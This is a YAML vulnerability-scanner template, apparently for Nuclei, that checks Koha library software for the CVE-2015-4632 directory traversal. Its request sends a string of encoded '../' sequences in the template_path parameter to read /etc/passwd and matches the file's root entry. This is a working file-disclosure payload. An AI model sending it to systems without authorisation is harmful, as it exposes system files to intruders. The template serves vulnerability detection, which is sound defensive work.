46 lines
1.8 KiB
YAML
46 lines
1.8 KiB
YAML
id: CVE-2015-4632
|
|
|
|
info:
|
|
name: Koha 3.20.1 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
|
|
remediation: |
|
|
Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/37388
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4632
|
|
- https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
|
|
- https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
|
|
- https://koha-community.org/koha-3-14-16-released/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-4632
|
|
cwe-id: CWE-22
|
|
epss-score: 0.0282
|
|
epss-percentile: 0.89569
|
|
cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: koha
|
|
product: koha
|
|
tags: cve,cve2015,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100b35e1de3c9f89452fcfc9e6f072528ef96eeadf470e5d41c7cfca216be57453702205b88603a8d9b708a06c89805865f05ac2cd90553ea3cf165e8a4569b3add0a25:922c64590222798bb761d5b6d8e72950
|